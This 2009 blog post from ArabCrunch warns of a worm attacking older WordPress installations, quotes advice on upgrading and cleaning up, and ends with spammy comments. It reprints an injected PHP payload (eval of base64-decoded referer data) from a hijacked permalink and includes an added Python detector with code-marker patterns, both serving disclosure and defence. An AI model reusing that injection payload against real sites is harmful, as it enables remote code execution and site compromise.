(Alert) ArabCrunch and WordPress Under Attack: Upgrade your WordPress site IMMEDIATELY.

6 Sep, 2009

Yesterday, I discovered that the permalinks of ArabCrunch posts are not working and have changed to:

http://arabcrunch.com/2009/09/03/facebook-starts-rolling-out-a-new-tweaked-inbox-fanpages-updates-now-more-visible/%&%28%7B$%7Beval%28base64_decode%28$_SERVER%5BHTTP_REFERER%5D%29%29%7D%7D|.+%29&%/

I panicked, and as ArabCrunch runs on the most popular free open source blogging platform, WordPress (WP), I upgraded WP to the latest version and changed the permalinks back to their original form.
But today, at a certain point, some old posts’ permalinks did not work, and I was now sure AC is under attack. Looking at today’s blog post by Matthew Mullenweg, WordPress co-founder, the problem I am facing is actually a worm that has been attacking self-hosted WordPress blogs that are older than the current 2.8.4 version.
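A defensive check for the symptom described above, added here as an example (it is not code from ArabCrunch or WordPress): it validates a `permalink_structure` option value against WordPress's structure tags and scans access-log requests for the injected code markers. The sample structure and log lines are constructed; only the injected tail is taken from the URL quoted in this post.

```python
import re
from urllib.parse import unquote

# WordPress's documented permalink structure tags.
ALLOWED_TAGS = ("%year%", "%monthnum%", "%day%", "%hour%", "%minute%", "%second%",
                "%post_id%", "%postname%", "%category%", "%author%")
# PHP code markers that never belong in a post URL or a permalink structure.
CODE_MARKERS = re.compile(r"eval\s*\(|base64_decode\s*\(|\$_[A-Z]+|\$\{", re.I)

def decode_fully(text, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are seen too."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def permalink_structure_problems(structure):
    """Reasons a raw permalink_structure value looks tampered with.
    The value is not URL-decoded: %day% and %category% would be misread as escapes."""
    problems = []
    if CODE_MARKERS.search(structure):
        problems.append("contains PHP code markers")
    leftover = structure
    for tag in ALLOWED_TAGS:
        leftover = leftover.replace(tag, "")
    if re.search(r"[^A-Za-z0-9/_.\-]", leftover):
        problems.append("characters outside tags, slashes and slugs")
    return problems

def suspicious_requests(log_lines):
    """Yield (line_number, path) for access-log requests carrying code markers."""
    for number, line in enumerate(log_lines, 1):
        match = re.search(r'"(?:GET|POST|HEAD) (\S+)', line)
        if match and CODE_MARKERS.search(decode_fully(match.group(1))):
            yield number, match.group(1)

# Constructed samples; INJECTED is the tail of the URL quoted in the post.
INJECTED = "%&%28%7B$%7Beval%28base64_decode%28$_SERVER%5BHTTP_REFERER%5D%29%29%7D%7D|.+%29&%/"
CLEAN_STRUCTURE = "/%year%/%monthnum%/%day%/%postname%/"
TAMPERED_STRUCTURE = CLEAN_STRUCTURE + unquote(INJECTED)
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Sep/2009:10:00:01 +0000] "GET /2009/09/03/some-post/ HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Sep/2009:10:00:07 +0000] "GET /2009/09/03/some-post/' + INJECTED + ' HTTP/1.1" 404 312',
]

if __name__ == "__main__":
    print(permalink_structure_problems(TAMPERED_STRUCTURE))
    print(list(suspicious_requests(SAMPLE_LOG)))
```
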

In his post Matt wrote:

It is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

And this is exactly what happened to AC: 7 new users have registered on AC’s WP in the last few days, something that was strange to me. Here are their emails:

janson206@Safe-mail.net

pulvillarrac@gmail.com

bugbeemershonyhe@gmail.com

obierebelominepyb@gmail.com
naomyrotenford@gmail.com

This worm is dangerous, as Matt explains:

Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

Matt, Lorelle and ArabCrunch urge all WP users to update their WordPress sites IMMEDIATELY to the latest version. Change ALL passwords to a strong password immediately, including WordPress blog access for all users, database, FTP, control panels, everything.

And if you had the symptoms I described above, Lorelle suggests the following:

If your site has already been attacked, it appears that the hack attacks the database, going deep. We’re looking for solutions, but the easiest appears to be to export all your content with the built-in XML WordPress export (pre 2.1 versions, try the WordPress-to-WordPress Import WordPress Plugin) and literally remove your WordPress installation totally (save images and general files). DO NOT EXPORT YOUR DATABASE! Install the latest version of WordPress and add the “clean” backup of your WordPress Theme, then import the XML export. The export will contain your posts, Pages, and comments, and hopefully no other hacked code.

Since I do not know how well the attacker has infiltrated AC, I will tomorrow, by the will of God, delete the WP installation and clean up the database, after doing another export, and reinstall WP.

This worm is against the spirit of the open source community (shame on the perpetrator/s) and comes at a time when I was planning to launch the Arabic version of ArabCrunch in 2 days. But now I have to fix this ASAP. And since AC’s theme is old, I will finish customizing a theme I started working with a while ago. So be patient in the coming few days.

If you find any problems while browsing ArabCrunch, please report them to my email: editor _attt_ arabcrunch _dottt_ com

If you are running WP, make sure to read these posts:

Keep WordPress secure.

WordPress Versions under Attack

How to clean up your hacked WP installation.

WP Permalink RSS problems.

(PS: Thanks to everyone who helped in this.)

Image by Civitanova Marche.


  1. @mmahgoub  |  September 6th, 2009 at 1:59 AM #

    Allah satar this time. Next time when you see an available update notice, please take it seriously!

  2. (Alert) ArabCrunch and WordPress Under Attack: Upgrade your … | Under ar mour live today.  |  September 6th, 2009 at 6:50 AM #

    [...] that the permalinks of ArabCrunch posts are not employed and hit changed. See the example post: (Alert) ArabCrunch and WordPress Under Attack: Upgrade your … Posted in Uncategorized | Tags: and-have, not-working, permalinks, posts-are, [...]

  3. How to Make Money Online »  Back to Twitter  |  September 6th, 2009 at 1:41 PM #

    [...] admin panel for a while now, but after after reading the warning and the incident that happened on Arabcrunch I decided to upgrade immediately, and you should too, I guess an exploit similar to this was behind [...]

  4. ArabCrunch.com Reports Wordpress Worm Attack « Social MENA  |  September 6th, 2009 at 10:28 PM #

    [...] literaly every professional blogger started urging others to upgrade and it’s actually worth reading about it to get some useful information on how to avoid it and clean-up after [...]

  5. estetik  |  September 7th, 2009 at 10:32 PM #

    thanks, i can quote this article ?

  6. Older versions of WordPress under attack posted @ drew3ooo  |  September 22nd, 2009 at 2:42 PM #

    [...] 2.8.4. which can allow nasty things like permalinks being changed to direct people elsewhere, as ArabCrunch points [...]

  7. abrcity  |  September 23rd, 2009 at 6:39 PM #

    very nice article,very helpful

  8. Mr. Twitter  |  September 24th, 2009 at 9:08 PM #

    O.K. I agree with you!THANKS! You guys do a great blog, and have some great contents. Keep up the good work.

  9. escorts latin  |  July 24th, 2010 at 2:43 AM #

    I would like to read a bit more on this blog soon. By the way, rather good design this blog has, but what do you think about changing it every few months?

    Abigail Funweather

  10. AnnaGunish  |  October 29th, 2011 at 12:28 PM #

    Nice blog! I will be back for new info! Keep it up! And consider adding bigger number of pictures!

    Anna Gunish
    London young escort
